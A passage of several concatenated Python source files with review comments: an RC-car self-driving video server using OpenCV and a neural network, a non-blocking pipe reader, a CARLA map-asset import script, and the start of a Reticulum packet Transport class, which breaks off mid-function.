    # h1: stop sign
    h1 = 15.5 - 10  # cm
    # h2: traffic light
    h2 = 15.5 - 10

    # create neural network
    # NOTE(review): these are class attributes, so the model/serial port are
    # created at import time and shared across handler instances.
    model = NeuralNetwork()
    model.create()

    obj_detection = ObjectDetection()
    rc_car = RCControl()

    # cascade classifiers
    stop_cascade = cv2.CascadeClassifier('cascade_xml/stop_sign.xml')
    light_cascade = cv2.CascadeClassifier('cascade_xml/traffic_light.xml')

    d_to_camera = DistanceToCamera()
    d_stop_sign = 25
    d_light = 25

    stop_start = 0              # start time when stop at the stop sign
    stop_finish = 0
    stop_time = 0
    drive_time_after_stop = 0

    def handle(self):
        global sensor_data
        stream_bytes = ' '
        stop_flag = False
        stop_sign_active = True

        # stream video frames one by one
        try:
            while True:
                stream_bytes += self.rfile.read(1024)
                # JPEG SOI/EOI markers delimit each frame in the byte stream.
                first = stream_bytes.find('\xff\xd8')
                last = stream_bytes.find('\xff\xd9')
                if first != -1 and last != -1:
                    jpg = stream_bytes[first:last + 2]
                    stream_bytes = stream_bytes[last + 2:]
                    gray = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.CV_LOAD_IMAGE_GRAYSCALE)
                    image = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.CV_LOAD_IMAGE_UNCHANGED)

                    # lower half of the image
                    half_gray = gray[120:240, :]

                    # object detection
                    v_param1 = self.obj_detection.detect(self.stop_cascade, gray, image)
                    v_param2 = self.obj_detection.detect(self.light_cascade, gray, image)

                    # distance measurement
                    if v_param1 > 0 or v_param2 > 0:
                        d1 = self.d_to_camera.calculate(v_param1, self.h1, 300, image)
                        d2 = self.d_to_camera.calculate(v_param2, self.h2, 100, image)
                        self.d_stop_sign = d1
                        self.d_light = d2

                    cv2.imshow('image', image)
                    cv2.imshow('mlp_image', half_gray)

                    # reshape image
                    image_array = half_gray.reshape(1, 38400).astype(np.float32)

                    # neural network makes prediction
                    prediction = self.model.predict(image_array)

                    # stop conditions
                    if sensor_data is not None and sensor_data < 50:
                        # Obstacle within 50cm: trigger overtake maneuver.
                        print("Stop, obstacle in front")
                        self.rc_car.over()

                    elif 0 < self.d_stop_sign < 25 and stop_sign_active:
                        print("Stop sign ahead")
                        self.rc_car.stop()

                        # stop for 5 seconds
                        if stop_flag is False:
                            self.stop_start = cv2.getTickCount()
                            stop_flag = True
                        self.stop_finish = cv2.getTickCount()

                        self.stop_time = (self.stop_finish - self.stop_start) / cv2.getTickFrequency()
                        print "Stop time: %.2fs" % self.stop_time

                        # 5 seconds later, continue driving
                        if self.stop_time > 5:
                            print("Waited for 5 seconds")
                            stop_flag = False
                            stop_sign_active = False

                    elif 0 < self.d_light < 30:
                        # print("Traffic light ahead")
                        if self.obj_detection.red_light:
                            print("Red light")
                            self.rc_car.stop()
                        elif self.obj_detection.green_light:
                            print("Green light")
                            pass
                        elif self.obj_detection.yellow_light:
                            print("Yellow light flashing")
                            pass

                        # Reset light state for the next frame.
                        self.d_light = 30
                        self.obj_detection.red_light = False
                        self.obj_detection.green_light = False
                        self.obj_detection.yellow_light = False

                    else:
                        self.rc_car.steer(prediction)
                        self.stop_start = cv2.getTickCount()
                        self.d_stop_sign = 25

                        # Re-arm stop-sign handling 5s after pulling away.
                        if stop_sign_active is False:
                            self.drive_time_after_stop = (self.stop_start - self.stop_finish) / cv2.getTickFrequency()
                            if self.drive_time_after_stop > 5:
                                stop_sign_active = True

                    if cv2.waitKey(1) & 0xFF == ord('q'):
                        self.rc_car.stop()
                        break
            cv2.destroyAllWindows()

        finally:
            print "Connection closed on thread 1"


class ThreadServer(object):
    """Starts one TCP server per data stream.

    NOTE(review): this code runs in the CLASS BODY, i.e. at import time,
    not when ThreadServer() is instantiated in __main__.
    """

    def server_thread(host, port):
        server = SocketServer.TCPServer((host, port), VideoStreamHandler)
        server.serve_forever()

    def server_thread2(host, port):
        server = SocketServer.TCPServer((host, port), SensorDataHandler)
        server.serve_forever()

    distance_thread = threading.Thread(target=server_thread2, args=('192.168.137.1', 8004))
    distance_thread.start()
    # NOTE(review): bug — server_thread(...) is CALLED here instead of being
    # passed as target=, so serve_forever() blocks this (main) thread and the
    # Thread object below is never reached. Should be
    # target=server_thread, args=('192.168.137.1', 8002).
    video_thread = threading.Thread(target=server_thread('192.168.137.1', 8002))
    video_thread.start()


if __name__ == '__main__':
    ThreadServer()
pipereader.py
'''
Created on Sep 16, 2015

@author: anotherpyr
'''
from threading import Thread

# Fix: the original `from Queue import ...` is Python-2-only and raises
# ImportError on Python 3, where the module was renamed to `queue`.
# Try the old name first so Python 2 behavior is unchanged.
try:
    from Queue import Queue, Empty  # Python 2
except ImportError:
    from queue import Queue, Empty  # Python 3


class PipeReader:
    """Non-blocking line reader for a pipe or file-like object.

    A daemon thread drains the pipe line by line into an internal queue,
    so callers can poll ``readline()`` without ever blocking on the pipe.
    """

    def __init__(self, pipe):
        """Start draining *pipe* in the background.

        :param pipe: object with ``readline()`` (returning ``b''`` at EOF)
            and ``close()`` — e.g. ``subprocess.Popen.stdout``.
        """
        self.queue = Queue()
        self.pipe = pipe
        # Daemon thread: never keeps the interpreter alive on exit.
        t = Thread(target=self.enqueue)
        t.daemon = True
        t.start()

    def enqueue(self):
        """Background worker: push each line onto the queue, close at EOF."""
        for line in iter(self.pipe.readline, b''):
            self.queue.put(line)
        self.pipe.close()

    def readline(self):
        """Return the next buffered line, or ``None`` if nothing is ready.

        Never blocks; lines are returned in the order they were read.
        """
        try:
            return self.queue.get_nowait()
        except Empty:
            return None
Import.py
#!/usr/bin/env python

# Copyright (c) 2019 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.

"""Import Assets to Carla"""

from __future__ import print_function

import errno
import fnmatch
import glob
import json
import os
import shutil
import subprocess
import sys
import argparse
import threading
import copy

# Global variables
IMPORT_SETTING_FILENAME = "importsetting.json"
SCRIPT_NAME = os.path.basename(__file__)
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
# Go two directories above the current script
CARLA_ROOT_PATH = os.path.normpath(SCRIPT_DIR + '/../..')

# Put the matching carla egg for this interpreter/platform on sys.path;
# silently continue if no egg is found (import below will then fail loudly).
try:
    sys.path.append(glob.glob(os.path.join(CARLA_ROOT_PATH, "PythonAPI/carla/dist/carla-*%d.%d-%s.egg" % (
        sys.version_info.major,
        sys.version_info.minor,
        'win-amd64' if os.name == 'nt' else 'linux-x86_64')))[0])
except IndexError:
    pass

import carla


def get_packages_json_list(folder):
    """Returns a list with the paths of each package's json
    files that has been found recursively in the input folder.
    """
    json_files = []

    for root, _, filenames in os.walk(folder):
        for filename in fnmatch.filter(filenames, "*.json"):
            # The decals config has its own reader; exclude it here.
            if filename != "roadpainter_decals.json":
                json_files.append([root, filename])

    return json_files


def get_decals_json_file(folder):
    """Return the filename of the first roadpainter_decals.json found under
    folder, or "" if none exists."""
    for root, _, filenames in os.walk(folder):
        for filename in fnmatch.filter(filenames, "roadpainter_decals.json"):
            return filename

    return ""


def generate_json_package(folder, package_name, use_carla_materials):
    """Generate a .json file with all the maps it founds on the folder
    and subfolders. A map is a .fbx and a .xodr with the same name.
    """
    json_files = []

    # search for all .fbx and .xodr pair of files
    maps = []
    for root, _, filenames in os.walk(folder):
        files = fnmatch.filter(filenames, "*.xodr")
        for file_name in files:
            xodr = file_name[:-5]  # strip the ".xodr" extension
            # check if exist the .fbx file
            if os.path.exists("%s/%s.fbx" % (root, xodr)):
                maps.append([os.path.relpath(root, folder), xodr, ["%s.fbx" % xodr]])
            else:
                # check if exist the map by tiles
                tiles = fnmatch.filter(filenames, "*_Tile_*.fbx")
                if (len(tiles) > 0):
                    maps.append([os.path.relpath(root, folder), xodr, tiles])

    # write the json
    if (len(maps) > 0):
        # build all the maps in .json format
        json_maps = []
        for map_name in maps:
            path = map_name[0].replace('\\', '/')
            name = map_name[1]
            tiles = map_name[2]
            tiles = ["%s/%s" % (path, x) for x in tiles]
            map_dict = {
                'name': name,
                'xodr': '%s/%s.xodr' % (path, name),
                'use_carla_materials': use_carla_materials
            }
            # check for only one 'source' or map in 'tiles'
            if (len(tiles) == 1):
                map_dict['source'] = tiles[0]
            else:
                map_dict['tile_size'] = 2000
                map_dict['tiles'] = tiles
            # write
            json_maps.append(map_dict)

        # build and write the .json
        f = open("%s/%s.json" % (folder, package_name), "w")
        my_json = {'maps': json_maps, 'props': []}
        serialized = json.dumps(my_json, sort_keys=False, indent=3)
        f.write(serialized)
        f.close()
        # add
        json_files.append([folder, "%s.json" % package_name])

    return json_files


def generate_decals_file(folder):
    """Write a default roadpainter_decals.json for every map found in folder."""
    # search for all .fbx and .xodr pair of files
    maps = []
    for root, _, filenames in os.walk(folder):
        files = fnmatch.filter(filenames, "*.xodr")
        for file_name in files:
            xodr = file_name[:-5]
            # check if exist the .fbx file
            if os.path.exists("%s/%s.fbx" % (root, xodr)):
                maps.append([os.path.relpath(root, folder), xodr, ["%s.fbx" % xodr]])
            else:
                # check if exist the map by tiles
                tiles = fnmatch.filter(filenames, "*_Tile_*.fbx")
                if (len(tiles) > 0):
                    maps.append([os.path.relpath(root, folder), xodr, tiles])

    if (len(maps) > 0):
        # build all the maps in .json format
        json_decals = []
        for map_name in maps:
            name = map_name[1]
            # create the decals default config file
            # (values are per-decal spawn weights/percentages consumed by the
            # road painter; keys must match the decal asset names)
            json_decals.append({
                'map_name' : name,
                'drip1': '10', 'drip3': '10',
                'dirt1': '10', 'dirt3' : '10', 'dirt4' : '10', 'dirt5': '10',
                'roadline1': '20', 'roadline5': '20',
                'tiremark1': '20', 'tiremark3': '20',
                'tarsnake1': '10', 'tarsnake3': '20', 'tarsnake4': '10',
                'tarsnake5': '20', 'tarsnake11': '20',
                'cracksbig1': '10', 'cracksbig3': '10', 'cracksbig5': '10',
                'cracksbig8': '10',
                'mud1' : '10', 'mud5' : '10',
                'oilsplat1' : '20', 'oilsplat2' : '20', 'oilsplat3' : '20',
                'oilsplat4' : '20', 'oilsplat5' : '20',
                'gum' : '30',
                'crack1': '10', 'crack3' : '10', 'crack4' : '10',
                'crack5' : '10', 'crack8': '10',
                'decal_scale' : {
                    'x_axis' : '1.0',
                    'y_axis' : '1.0',
                    'z_axis' : '1.0'},
                'fixed_decal_offset': {
                    'x_axis' : '15.0',
                    'y_axis' : '15.0',
                    'z_axis' : '0.0'},
                'decal_min_scale' : '0.3',
                'decal_max_scale' : '0.7',
                'decal_random_yaw' : '360.0',
                'random_offset' : '50.0'
            });

        # build and write the .json
        f = open("%s/%s.json" % (folder, 'roadpainter_decals'), "w")
        my_json = {'decals': json_decals}
        serialized = json.dumps(my_json, sort_keys=False, indent=3)
        f.write(serialized)
        f.close()


def invoke_commandlet(name, arguments):
    """Generic function for running a commandlet with its arguments."""
    # Requires UE4_ROOT in the environment; raises KeyError otherwise.
    ue4_path = os.environ["UE4_ROOT"]
    uproject_path = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "CarlaUE4.uproject")
    run = "-run=%s" % (name)

    if os.name == "nt":
        sys_name = "Win64"
        editor_path = "%s/Engine/Binaries/%s/UE4Editor" % (ue4_path, sys_name)
        command = [editor_path, uproject_path, run]
        command.extend(arguments)
        print("Commandlet:", command)
        subprocess.check_call(command, shell=True)
    elif os.name == "posix":
        sys_name = "Linux"
        editor_path = "%s/Engine/Binaries/%s/UE4Editor" % (ue4_path, sys_name)
        full_command = "%s %s %s %s" % (editor_path, uproject_path, run, " ".join(arguments))
        print("Commandlet:", full_command)
        # NOTE(review): Windows path checks the exit code (check_call) but the
        # posix path uses subprocess.call and ignores failures.
        subprocess.call([full_command], shell=True)


def generate_import_setting_file(package_name, json_dirname, props, maps, do_tiles, tile_size):
    """Creates the PROPS and MAPS import_setting.json file needed
    as an argument for using the ImportAssets commandlet
    """
    importfile = os.path.join(os.getcwd(), IMPORT_SETTING_FILENAME)
    if os.path.exists(importfile):
        os.remove(importfile)

    with open(importfile, "w+") as fh:
        import_groups = []
        file_names = []
        import_settings = {
            "bImportMesh": 1,
            "bConvertSceneUnit": 1,
            "bConvertScene": 1,
            "bCombineMeshes": 1,
            "bImportTextures": 1,
            "bImportMaterials": 1,
            "bRemoveDegenerates": 1,
            "AnimSequenceImportData": {},
            "SkeletalMeshImportData": {},
            "TextureImportData": {},
            "StaticMeshImportData": {
                "bRemoveDegenerates": 1,
                "bAutoGenerateCollision": 1,
                "bCombineMeshes": 0,
                "bConvertSceneUnit": 1,
                "bForceVerticesRelativeToTile": do_tiles,
                "TileSize": tile_size
            }
        }

        for prop in props:
            props_dest = "/" + "/".join(["Game", package_name, "Static", prop["tag"], prop["name"]])

            file_names = [os.path.join(json_dirname, prop["source"])]
            import_groups.append({
                "ImportSettings": import_settings,
                "FactoryName": "FbxFactory",
                "DestinationPath": props_dest,
                "bReplaceExisting": "true",
                "FileNames": file_names
            })

        for umap in maps:
            maps_dest = "/" + "/".join(["Game", package_name, "Maps", umap["name"]])

            # Single-source map uses "source"; tiled maps list every tile fbx.
            if "source" in umap:
                tiles = [os.path.join(json_dirname, umap["source"])]
            else:
                tiles = ["%s" % (os.path.join(json_dirname, x)) for x in umap["tiles"]]
            import_groups.append({
                "ImportSettings": import_settings,
                "FactoryName": "FbxFactory",
                "DestinationPath": maps_dest,
                "bReplaceExisting": "true",
                "FileNames": tiles
            })

        fh.write(json.dumps({"ImportGroups": import_groups}))
        fh.close()
    return importfile


def generate_package_file(package_name, props, maps):
    """Creates the PackageName.Package.json file for the package."""
    output_json = {}

    output_json["props"] = []
    for prop in props:
        name = prop["name"]
        size = prop["size"]
        source_name = os.path.basename(prop["source"]).split('.')
        # NOTE(review): the condition triggers when there are FEWER than two
        # dot-separated parts (i.e. no extension), yet the warning text says
        # "multiple dots" — message and check disagree.
        if len(source_name) < 2:
            print("[Warning] File name '" + prop["source"] + "' contains multiple dots ('.')")

        source_name = '.'.join([source_name[0], source_name[0]])

        path = "/" + "/".join(["Game", package_name, "Static", prop["tag"], prop["name"], source_name])

        output_json["props"].append({
            "name": name,
            "path": path,
            "size": size,
        })

    output_json["maps"] = []
    for umap in maps:
        path = "/" + "/".join(["Game", package_name, "Maps", umap["name"]])
        use_carla_materials = umap["use_carla_materials"] if "use_carla_materials" in umap else False
        output_json["maps"].append({
            "name": umap["name"],
            "path": path,
            "use_carla_materials": use_carla_materials
        })

    package_config_path = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "Content", package_name, "Config")
    if not os.path.exists(package_config_path):
        try:
            os.makedirs(package_config_path)
        except OSError as exc:
            if exc.errno != errno.EEXIST:
                raise

    with open(os.path.join(package_config_path, package_name + ".Package.json"), "w+") as fh:
        json.dump(output_json, fh, indent=4)


def copy_roadpainter_config_files(package_name):
    """Copies roadpainter configuration files into Unreal content folder"""

    two_directories_up = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
    final_path = os.path.join(two_directories_up, "Import", "roadpainter_decals.json")
    package_config_path = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "Content", package_name, "Config")
    if not os.path.exists(package_config_path):
        try:
            os.makedirs(package_config_path)
        except OSError as exc:
            if exc.errno != errno.EEXIST:
                raise
    shutil.copy(final_path, package_config_path)


# NOTE(review): exact duplicate of the definition above — the second
# definition silently shadows the first and one of them should be removed.
def copy_roadpainter_config_files(package_name):
    """Copies roadpainter configuration files into Unreal content folder"""

    two_directories_up = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
    final_path = os.path.join(two_directories_up, "Import", "roadpainter_decals.json")
    package_config_path = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "Content", package_name, "Config")
    if not os.path.exists(package_config_path):
        try:
            os.makedirs(package_config_path)
        except OSError as exc:
            if exc.errno != errno.EEXIST:
                raise
    shutil.copy(final_path, package_config_path)


def import_assets(package_name, json_dirname, props, maps, do_tiles, tile_size, batch_size):
    """Same commandlet is used for importing assets and also maps."""
    commandlet_name = "ImportAssets"

    if do_tiles:
        for umap in maps:
            # import groups of tiles to prevent unreal from using too much memory
            map_template = {}
            for key, value in iter(umap.items()):
                # NOTE(review): `is not` compares identity, not equality —
                # works only because CPython interns short string literals;
                # should be `key != 'tiles'`.
                if key is not 'tiles':
                    map_template[key] = value
            map_template['tiles'] = []
            tiles = umap['tiles']
            tiles.sort()
            total_tiles = len(tiles)
            # NOTE(review): num_batches is computed but never used.
            num_batches = int(total_tiles / batch_size)
            current_tile = 0
            current_batch = 0
            current_batch_size = 0
            current_batch_map = copy.deepcopy(map_template)
            # get groups of tiles
            while current_tile < total_tiles:
                current_batch_map['tiles'].append(tiles[current_tile])
                file_path = os.path.join(json_dirname, tiles[current_tile])
                # accumulate batch size in MB
                current_batch_size += os.path.getsize(file_path)/1000000.0
                current_tile += 1
                current_batch += 1
                # import when the size of the group of tiles surpasses the specified size in MB
                if current_batch_size >= batch_size:
                    import_setting_file = generate_import_setting_file(package_name, json_dirname, props, [current_batch_map], do_tiles, tile_size)
                    commandlet_arguments = ["-importSettings=\"%s\"" % import_setting_file, "-nosourcecontrol", "-replaceexisting"]
                    invoke_commandlet(commandlet_name, commandlet_arguments)
                    os.remove(import_setting_file)
                    current_batch_map = copy.deepcopy(map_template)
                    current_batch = 0
                    current_batch_size = 0
            # import remaining tiles
            if current_batch > 0:
                import_setting_file = generate_import_setting_file(package_name, json_dirname, props, [current_batch_map], do_tiles, tile_size)
                commandlet_arguments = ["-importSettings=\"%s\"" % import_setting_file, "-nosourcecontrol", "-replaceexisting"]
                invoke_commandlet(commandlet_name, commandlet_arguments)
                os.remove(import_setting_file)
    else:
        # Import Props
        import_setting_file = generate_import_setting_file(package_name, json_dirname, props, maps, do_tiles, tile_size)
        commandlet_arguments = ["-importSettings=\"%s\"" % import_setting_file, "-nosourcecontrol", "-replaceexisting"]
        invoke_commandlet(commandlet_name, commandlet_arguments)
        os.remove(import_setting_file)

    # Move maps XODR files if any
    for umap in maps:
        # Make sure XODR info is full and the file exists
        if "xodr" in umap and umap["xodr"] and os.path.isfile(os.path.join(json_dirname, umap["xodr"])):
            # Make sure the `.xodr` file have the same name than the `.umap`
            xodr_path = os.path.abspath(os.path.join(json_dirname, umap["xodr"]))
            umap_name = umap["name"]
            xodr_name = '.'.join([umap_name, "xodr"])
            xodr_folder_destin = os.path.join(
                CARLA_ROOT_PATH,
                "Unreal",
                "CarlaUE4",
                "Content",
                package_name,
                "Maps",
                umap_name,
                "OpenDrive")
            if not os.path.exists(xodr_folder_destin):
                os.makedirs(xodr_folder_destin)
            xodr_path_destin = os.path.join(
                xodr_folder_destin,
                xodr_name)
            print('Copying "' + xodr_path + '" to "' + xodr_path_destin + '"')
            shutil.copy2(xodr_path, xodr_path_destin)

    # Create package file
    generate_package_file(package_name, props, maps)


def import_assets_from_json_list(json_list, batch_size):
    """Drive the full import pipeline for every package json in json_list."""
    maps = []
    package_name = ""
    for dirname, filename in json_list:
        # Read json file
        with open(os.path.join(dirname, filename)) as json_file:
            data = json.load(json_file)
            # Take all the fbx registered in the provided json files
            # and place it inside unreal in the provided path (by the json file)
            maps = []
            props = []
            if "maps" in data:
                maps = data["maps"]
            if "props" in data:
                props = data["props"]

            # NOTE(review): maps[0] raises IndexError for a props-only
            # package (empty maps list).
            if "tile_size" in maps[0]:
                tile_size = maps[0]["tile_size"]
            else:
                tile_size = 2000

            package_name = filename.replace(".json", "")

            # we need to build the binary file for navigation of pedestrians
            # (runs concurrently with the UE4 import; joined below)
            thr = threading.Thread(target=build_binary_for_navigation, args=(package_name, dirname, maps,))
            thr.start()

            if ("tiles" in maps[0]):
                import_assets(package_name, dirname, props, maps, 1, tile_size, batch_size)
            else:
                import_assets(package_name, dirname, props, maps, 0, 0, 0)

            if not package_name:
                print("No Packages JSONs found, nothing to import. Skipping package.")
                continue

            # First we only move the meshes to the tagged folders for semantic segmentation
            move_assets_commandlet(package_name, maps)

            # We prepare only the maps for cooking after moving them. Props cooking will be done from Package.sh script.
            if len(maps) > 0:
                prepare_maps_commandlet_for_cooking(package_name, only_prepare_maps=True)
                load_asset_materials_commandlet(package_name)

            thr.join()

            build_binary_for_tm(package_name, dirname, maps)


def load_asset_materials_commandlet(package_name):
    """Run the LoadAssetMaterials commandlet for the package."""
    commandlet_name = "LoadAssetMaterials"
    commandlet_arguments = ["-PackageName=%s" % package_name]
    invoke_commandlet(commandlet_name, commandlet_arguments)


def prepare_maps_commandlet_for_cooking(package_name, only_prepare_maps):
    """Run the PrepareAssetsForCooking commandlet for the package."""
    commandlet_name = "PrepareAssetsForCooking"
    commandlet_arguments = ["-PackageName=%s" % package_name]
    commandlet_arguments.append("-OnlyPrepareMaps=%d" % only_prepare_maps)
    invoke_commandlet(commandlet_name, commandlet_arguments)


def move_assets_commandlet(package_name, maps):
    """Run the MoveAssets commandlet over every map of the package."""
    commandlet_name = "MoveAssets"
    commandlet_arguments = ["-PackageName=%s" % package_name]

    umap_names = ""
    for umap in maps:
        umap_names += umap["name"] + " "
    commandlet_arguments.append("-Maps=%s" % umap_names)

    invoke_commandlet(commandlet_name, commandlet_arguments)


# build the binary file for navigation of pedestrians for that map
def build_binary_for_navigation(package_name, dirname, maps):
    folder = os.path.join(CARLA_ROOT_PATH, "Util", "DockerUtils", "dist")

    # process each map
    for umap in maps:

        # get the sources for the map (single or tiles)
        if ("source" in umap):
            tiles = [umap["source"]]
        # disabled until we have a new Recast adapted to work with tiles
        # elif ("tiles" in umap):
        #     tiles = umap["tiles"]
        else:
            continue

        # get the target name
        target_name = umap["name"]
        xodr_filename = os.path.basename(umap["xodr"])

        # copy the XODR file into docker utils folder
        if "xodr" in umap and umap["xodr"] and os.path.isfile(os.path.join(dirname, umap["xodr"])):
            # Make sure the `.xodr` file have the same name than the `.umap`
            xodr_path_source = os.path.abspath(os.path.join(dirname, umap["xodr"]))
            xodr_path_target = os.path.join(folder, xodr_filename)
            # copy
            print('Copying "' + xodr_path_source + '" to "' + xodr_path_target + '"')
            shutil.copy2(xodr_path_source, xodr_path_target)

        for tile in tiles:
            fbx_filename = os.path.basename(tile)
            fbx_name_no_ext = os.path.splitext(fbx_filename)[0]

            # copy the FBX file into docker utils folder
            if os.path.isfile(os.path.join(dirname, tile)):
                # Make sure the `.fbx` file have the same name than the `.umap`
                fbx_path_source = os.path.abspath(os.path.join(dirname, tile))
                fbx_path_target = os.path.join(folder, fbx_filename)
                # copy
                print('Copying "' + fbx_path_source + '" to "' + fbx_path_target + '"')
                shutil.copy2(fbx_path_source, fbx_path_target)

            # rename the xodr with the same name of the source/tile
            # os.rename(os.path.join(folder, xodr_filename), os.path.join(folder, "%s.xodr" % fbx_name_no_ext))

            # make the conversion (external Recast build script)
            if os.name == "nt":
                subprocess.call(["build.bat", fbx_name_no_ext, xodr_filename], cwd=folder, shell=True)
            else:
                subprocess.call(["chmod +x build.sh"], cwd=folder, shell=True)
                subprocess.call("./build.sh %s %s" % (fbx_name_no_ext, xodr_filename), cwd=folder, shell=True)

            # rename the xodr with the original name
            # os.rename(os.path.join(folder, "%s.xodr" % fbx_name_no_ext), os.path.join(folder, xodr_filename))

            # copy the binary file
            nav_path_source = os.path.join(folder, "%s.bin" % fbx_name_no_ext)
            nav_folder_target = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "Content", package_name, "Maps", target_name, "Nav")
            if os.path.exists(nav_path_source):
                if not os.path.exists(nav_folder_target):
                    os.makedirs(nav_folder_target)
                nav_path_target = os.path.join(nav_folder_target, "%s.bin" % fbx_name_no_ext)
                print('Copying "' + nav_path_source + '" to "' + nav_path_target + '"')
                shutil.copy2(nav_path_source, nav_path_target)

            # remove files
            if os.path.exists(nav_path_source):
                os.remove(nav_path_source)

            if os.path.exists(fbx_path_target):
                os.remove(fbx_path_target)

        os.remove(xodr_path_target)


def build_binary_for_tm(package_name, dirname, maps):
    """Cook the Traffic Manager in-memory map binary for each map's XODR."""
    # De-duplicate (name, xodr) pairs in case maps share an OpenDrive file.
    xodrs = set(
        (map["name"], map["xodr"]) for map in maps if "xodr" in map)
    for target_name, xodr in xodrs:
        with open(os.path.join(dirname, xodr), "rt") as f:
            data = f.read()
        # copy the binary file
        tm_folder_target = os.path.join(
            CARLA_ROOT_PATH,
            "Unreal",
            "CarlaUE4",
            "Content",
            package_name,
            "Maps",
            target_name,
            "TM")
        if not os.path.exists(tm_folder_target):
            os.makedirs(tm_folder_target)
        m = carla.Map(str(target_name), data)
        m.cook_in_memory_map(str(os.path.join(tm_folder_target, "%s.bin" % target_name)))


def main():
    argparser = argparse.ArgumentParser(description=__doc__)
    argparser.add_argument(
        '--package',
        metavar='P',
        default='map_package',
        help='Name of the imported package')
    argparser.add_argument(
        '--no-carla-materials',
        action='store_false',
        help='user Carla materials')
    argparser.add_argument(
        '--json-only',
        action='store_true',
        help='Create JSON files only')
    argparser.add_argument(
        '--batch-size',
        type=float,
        default=300,
        help='Max batch size in MB')
    args = argparser.parse_known_args()[0]

    import_folder = os.path.join(CARLA_ROOT_PATH, "Import")
    json_list = get_packages_json_list(import_folder)
    decals_json = get_decals_json_file(import_folder)

    if len(json_list) < 1:
        # No package jsons supplied: auto-generate one from the Import folder.
        json_list = generate_json_package(import_folder, args.package, args.no_carla_materials)

    if len(decals_json) == 0:
        # NOTE(review): generate_decals_file returns None; the assignment to
        # decals_json_file is unused.
        decals_json_file = generate_decals_file(import_folder)

    if args.json_only == False:
        copy_roadpainter_config_files(args.package)
        import_assets_from_json_list(json_list, args.batch_size)

if __name__ == '__main__':
    main()
# ===== Transport.py =====
import os
import RNS
import time
import math
import threading
import traceback
from time import sleep

import vendor.umsgpack as umsgpack

class Transport:
    """Static singleton handling packet routing, announce propagation,
    link registration and the packet cache for an RNS instance.
    All state is class-level; all methods are @staticmethod.

    NOTE(review): several constructs here are Python-2-only
    (str.encode("hex_codec"), true-division slice indices, text-mode
    msgpack I/O) — flagged inline; confirm target interpreter.
    """
    # Transport types
    BROADCAST    = 0x00;
    TRANSPORT    = 0x01;
    RELAY        = 0x02;
    TUNNEL       = 0x03;
    types        = [BROADCAST, TRANSPORT, RELAY, TUNNEL]

    REACHABILITY_UNREACHABLE = 0x00
    REACHABILITY_DIRECT      = 0x01
    REACHABILITY_TRANSPORT   = 0x02

    # TODO: Document the addition of random windows
    # and max local rebroadcasts.
    PATHFINDER_M    = 18          # Max hops
    PATHFINDER_C    = 2.0         # Decay constant
    PATHFINDER_R    = 2           # Retransmit retries
    PATHFINDER_T    = 10          # Retry grace period
    PATHFINDER_RW   = 10          # Random window for announce rebroadcast
    PATHFINDER_E    = 60*15       # Path expiration in seconds

    # TODO: Calculate an optimal number for this in
    # various situations
    LOCAL_REBROADCASTS_MAX = 2    # How many local rebroadcasts of an announce is allowed

    interfaces        = []        # All active interfaces
    destinations      = []        # All active destinations
    pending_links     = []        # Links that are being established
    active_links      = []        # Links that are active
    packet_hashlist   = []        # A list of packet hashes for duplicate detection
    receipts          = []        # Receipts of all outgoing packets for proof processing
    announce_table    = {}        # A table for storing announces currently waiting to be retransmitted
    destination_table = {}        # A lookup table containing the next hop to a given destination

    # Cooperative lock between the job loop and outbound()/inbound().
    jobs_locked  = False
    jobs_running = False
    job_interval = 0.250
    receipts_last_checked    = 0.0
    receipts_check_interval  = 1.0
    announces_last_checked   = 0.0
    announces_check_interval = 1.0
    hashlist_maxsize         = 1000000

    identity = None

    @staticmethod
    def start():
        """Load (or create) the transport identity and the persisted packet
        hashlist, then start the background job loop thread."""
        if Transport.identity == None:
            transport_identity_path = RNS.Reticulum.configdir+"/transportidentity"
            if os.path.isfile(transport_identity_path):
                Transport.identity = RNS.Identity.from_file(transport_identity_path)

            if Transport.identity == None:
                RNS.log("No valid Transport Identity on disk, creating...", RNS.LOG_VERBOSE)
                Transport.identity = RNS.Identity()
                Transport.identity.save(transport_identity_path)
            else:
                RNS.log("Loaded Transport Identity from disk", RNS.LOG_VERBOSE)

        packet_hashlist_path = RNS.Reticulum.configdir+"/packet_hashlist"
        if os.path.isfile(packet_hashlist_path):
            try:
                # NOTE(review): msgpack data is binary — mode "r" breaks on
                # Python 3; should be "rb". TODO confirm interpreter target.
                file = open(packet_hashlist_path, "r")
                Transport.packet_hashlist = umsgpack.unpackb(file.read())
                file.close()
            except Exception as e:
                RNS.log("Could not load packet hashlist from disk, the contained exception was: "+str(e), RNS.LOG_ERROR)

        thread = threading.Thread(target=Transport.jobloop)
        thread.setDaemon(True)
        thread.start()

        RNS.log("Transport instance "+str(Transport.identity)+" started")

    @staticmethod
    def jobloop():
        # Background loop: run housekeeping every job_interval seconds.
        while (True):
            Transport.jobs()
            sleep(Transport.job_interval)

    @staticmethod
    def jobs():
        """Housekeeping pass: time out receipts, retransmit pending
        announces, and cap the duplicate-detection hashlist. Queued
        rebroadcasts are sent after jobs_running is cleared, since
        packet.send() re-enters outbound() which waits on that flag."""
        outgoing = []
        Transport.jobs_running = True
        try:
            if not Transport.jobs_locked:
                # Process receipts list for timed-out packets
                if time.time() > Transport.receipts_last_checked+Transport.receipts_check_interval:
                    for receipt in Transport.receipts:
                        thread = threading.Thread(target=receipt.check_timeout)
                        thread.setDaemon(True)
                        thread.start()
                        # NOTE(review): removing from the list being iterated
                        # skips the following element.
                        if receipt.status != RNS.PacketReceipt.SENT:
                            Transport.receipts.remove(receipt)

                    Transport.receipts_last_checked = time.time()

                # Process announces needing retransmission
                if time.time() > Transport.announces_last_checked+Transport.announces_check_interval:
                    for destination_hash in Transport.announce_table:
                        announce_entry = Transport.announce_table[destination_hash]
                        # TODO: remove comment and log output
                        # [time_heard, retransmit_timeout, retries, received_from, packet.hops, packet]
